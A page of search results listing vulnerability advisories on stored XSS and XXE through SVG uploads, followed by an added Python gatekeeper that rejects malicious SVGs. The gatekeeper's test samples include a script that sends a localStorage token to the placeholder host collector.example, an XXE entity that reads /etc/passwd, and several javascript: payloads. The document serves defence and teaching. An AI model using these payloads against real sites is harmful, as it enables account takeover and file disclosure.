18 matches found
PT-2026-46891
SVG files are in the allowed-extensions whitelist and can be uploaded by any admin user via the media manager. There is zero SVG content sanitization anywhere in the upload pipeline. A malicious SVG with a JavaScript onload handler executes in the context of the Shopware domain when accessed. The Proble...
phpMyFAQ cross-site scripting vulnerability
phpMyFAQ is a multilingual, database-driven FAQ system developed by Thorsten Rinne. Versions of phpMyFAQ prior to 4.1.2 had a cross-site scripting vulnerability. The vulnerability stemmed from SvgSanitizer::decodeAllEntities capping recursive entity decoding at 5 rounds, allowing users with...
Arbitrary File Upload
Overview Affected versions of this package are vulnerable to Arbitrary File Upload via the file upload functionality. An administrator can execute arbitrary JavaScript in the context of the application by uploading a crafted SVG or HTML file containing malicious scripts, which are then served to users without...
EUVD-2026-9022
PluXml CMS is vulnerable to Stored XSS in file uploading functionality. An authenticated attacker can upload an SVG file containing a malicious payload, which will be executed when a victim clicks the link associated with the uploaded image. In version 5.9.0-rc7 clicking the link associated with...
CVE-2026-27616
Vikunja prior to version 2.0.0 permitted uploading SVG attachments without sanitization. Uploaded SVGs rendered inline under the app’s origin, allowing embedded JavaScript to run in the context of the authenticated user, exposing the token stored in localStorage. This CVE describes a stored XSS r...
CVE-2026-24743 InvoicePlane has a Stored Cross-Site Scripting (XSS) issue
InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. A Stored Cross-Site Scripting (XSS) vulnerability exists in the Upload Invoice Logo function of InvoicePlane version 1.7.0. The Upload Invoice Logo function allows the application to upload SVG file...
CVE-2025-41085
Stored Cross-Site Scripting (XSS) vulnerability in Apidog version 2.7.15, where SVG image uploads are not properly sanitized. This allows attackers to embed malicious scripts in SVG files by sending a POST request to '/api/v1/user-avatar', which are then stored on the server and execute...
CVE-2025-14478
CVE-2025-14478 (Demo Importer Plus, WordPress) : The Demo Importer Plus plugin is vulnerable to XML External Entity (XXE) injection via SVG file uploads in all versions up to 2.0.9. Exploitation requires authentication at Author level or higher, and, in affected PHP configurations (older than 8.0...
CVE-2025-64759
Homarr is an open-source dashboard. Prior to version 1.43.3, a stored XSS vulnerability exists, allowing the execution of arbitrary JavaScript in a user's browser, with minimal or no user interaction required, due to the rendering of a malicious uploaded SVG file. This could be abused to add an...
homarr code issue vulnerability
homarr is a customizable browser homepage by Thomas Camlong, an individual developer, that is used to interact with Docker containers on the main server. A code issue vulnerability exists in homarr versions prior to 1.43.3, which stems from a maliciously uploaded SVG file that could lead to a...
CVE-2025-35060
Newforma Info Exchange NIX provides a 'Send a File Transfer' feature that allows a remote, authenticated attacker to upload SVG files that contain JavaScript or other content that may be executed or rendered by a web browser using a mobile user agent...
CVE-2025-59525
Horilla HRMS prior to 1.4.0 is vulnerable to Cross-Site Scripting (XSS) via uploaded SVG files (and via allowed embed/ tags), enabling script execution when affected content (e.g., announcements) is viewed and potentially leading to an admin account takeover. The issue stems from improper sanitiz...
Cross-site Scripting (XSS)
Overview digimix/wp-svg-upload is a plugin that adds full SVG media support to WordPress. Affected versions of this package are vulnerable to Cross-site Scripting XSS through the upload process. An attacker can inject malicious scripts by uploading specially crafted SVG files. PoC alert'xss';...
WordPress WP SVG Upload plugin <= 1.0.0 - Author+ Stored XSS via SVG vulnerability
Author+ Stored XSS via SVG vulnerability discovered by Pierre Rudloff in WordPress Plugin WP SVG Upload versions <= 1.0.0...
CVE-2024-7778
The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.10.36 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access...
PT-2024-22858 · Unknown · Volmarg Personal Management System
Name of the Vulnerable Software and Affected Versions: Volmarg Personal Management System version 1.4.64 Description: The issue concerns stored cross-site scripting (XSS) via the upload of an SVG file that contains embedded JavaScript code. This allows for the potential execution of malicious scrip...
PT-2024-29185 · WordPress · Cost Calculator Builder
Name of the Vulnerable Software and Affected Versions: Cost Calculator Builder plugin for WordPress versions up to, and including, 3.1.67 Description: The issue is related to Stored Cross-Site Scripting via the SVG upload feature due to insufficient input sanitization and output escaping. This...
CVE-2022-40358
An issue was discovered in AjaXplorer 4.2.3 that allows attackers to cause cross-site scripting via a crafted SVG file upload...
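Every entry above has the same root cause: an SVG is an XML document that browsers will execute as a page when it is opened directly under the application's origin, and the upload path either did not inspect it at all or inspected the raw bytes with a blocklist. Below is an added worked example, written for this page and not taken from any of the listed projects, of a stdlib-only Python gatekeeper that inspects the parsed document instead: it rejects DTD/entity declarations before parsing (the XXE vector from the Demo Importer Plus entry), then walks the element tree for script-bearing elements, event-handler attributes, javascript:/data: URLs and active CSS. Because it checks attribute values after the XML parser's single round of entity decoding, which is the same decoding a browser performs, an entity-encoded `&#106;avascript:` href is caught where a raw-byte regex misses it; the phpMyFAQ entry shows what happens when a sanitizer instead re-decodes a fixed number of times. The element and attribute lists, the `naive_raw_scan` contrast function, the sample SVGs and the `collector.example` host are all constructed for the example.

```python
"""Gatekeeper for user-uploaded SVG files (constructed example).

Rejects the SVG features the advisories above abuse: script elements,
event-handler attributes, javascript:/data: URLs, DTD/entity declarations
(XXE) and active CSS.  The document is parsed first and the *decoded*
values are inspected, so entity obfuscation is seen the way a browser
would see it.
"""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

# Elements that execute script or embed a foreign document (assumed list).
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
# Raw-byte markers rejected before parsing: a plain image never needs a DTD,
# an entity declaration or an external stylesheet PI.
RAW_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY|<\?xml-stylesheet", re.IGNORECASE)
# CSS constructs that fetch or execute (assumed list).
ACTIVE_CSS = re.compile(r"url\s*\(|expression\s*\(|@import|-moz-binding|behavior\s*:", re.IGNORECASE)
# A raw-byte blocklist, kept only to show its blind spot against entity encoding.
NAIVE_PATTERN = re.compile(rb"<script|\bon\w+\s*=|javascript:", re.IGNORECASE)


def local_name(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on qualified names."""
    return tag.rsplit("}", 1)[-1].lower()


def normalize_url(value: str) -> str:
    """Lower-case and drop every character <= space (a conservative superset of
    the tab/CR/LF a browser ignores inside a scheme), so 'Java\\tscript:' is
    compared as 'javascript:'."""
    return "".join(ch for ch in value if ch > " ").lower()


def url_is_forbidden(value: str) -> bool:
    """True for script schemes and for data: URLs that are not raster images."""
    url = normalize_url(value)
    if url.startswith(("javascript:", "vbscript:")):
        return True
    if url.startswith("data:"):
        # Inline raster images are common in exported artwork; anything else
        # (text/html, image/svg+xml, ...) is a script vehicle.
        return not url.startswith(("data:image/png", "data:image/jpeg", "data:image/gif", "data:image/webp"))
    return False


def svg_findings(data: bytes) -> list:
    """Return the reasons an upload must be rejected; an empty list means clean."""
    if RAW_MARKERS.search(data):
        return ["DOCTYPE/ENTITY declaration or stylesheet PI present"]  # do not parse a DTD at all
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]
    findings = []
    if root.tag != f"{{{SVG_NS}}}svg":
        findings.append(f"root element is {root.tag!r}, not SVG")
    for el in root.iter():
        name = local_name(el.tag)
        if name in FORBIDDEN_ELEMENTS:
            findings.append(f"forbidden element <{name}>")
        if name == "style" and el.text and ACTIVE_CSS.search(el.text):
            findings.append("active CSS in <style>")
        for attr, value in el.attrib.items():
            aname = local_name(attr)          # covers both href and xlink:href
            if aname.startswith("on"):
                findings.append(f"event handler attribute {aname} on <{name}>")
            elif aname in ("href", "src") and url_is_forbidden(value):
                findings.append(f"{aname}={value!r} on <{name}> uses a forbidden scheme")
            elif aname == "style" and ACTIVE_CSS.search(value):
                findings.append(f"active CSS in style attribute on <{name}>")
    return findings


def naive_raw_scan(data: bytes) -> bool:
    """Blocklist over the raw bytes; misses anything entity-encoded."""
    return bool(NAIVE_PATTERN.search(data))


# Constructed sample uploads, one per vector seen in the advisories.
SAMPLES = {
    "benign": b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4" fill="#c33"/></svg>',
    "onload": b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>',
    "script": b'<svg xmlns="http://www.w3.org/2000/svg"><script>fetch("//collector.example/?t="+localStorage.getItem("token"))</script></svg>',
    "entity_href": b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><a xlink:href="&#106;avascript:alert(1)"><text y="9">click</text></a></svg>',
    "xxe": b'<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><svg xmlns="http://www.w3.org/2000/svg"><text>&xxe;</text></svg>',
    "foreign": b'<svg xmlns="http://www.w3.org/2000/svg"><foreignObject><iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"/></foreignObject></svg>',
}

if __name__ == "__main__":
    for label, svg in SAMPLES.items():
        print(f"{label:12s} tree-check={svg_findings(svg) or 'clean'}  raw-regex-hit={naive_raw_scan(svg)}")
```

The check is a gate, not a cleaner: rejecting the file is simpler to get right than rewriting it. Independently of any content check, serving uploads from a separate origin, or with `Content-Disposition: attachment` and a `Content-Security-Policy: sandbox` response header, and embedding them only through `<img>` (which never executes SVG script) removes the origin context that every entry above depends on.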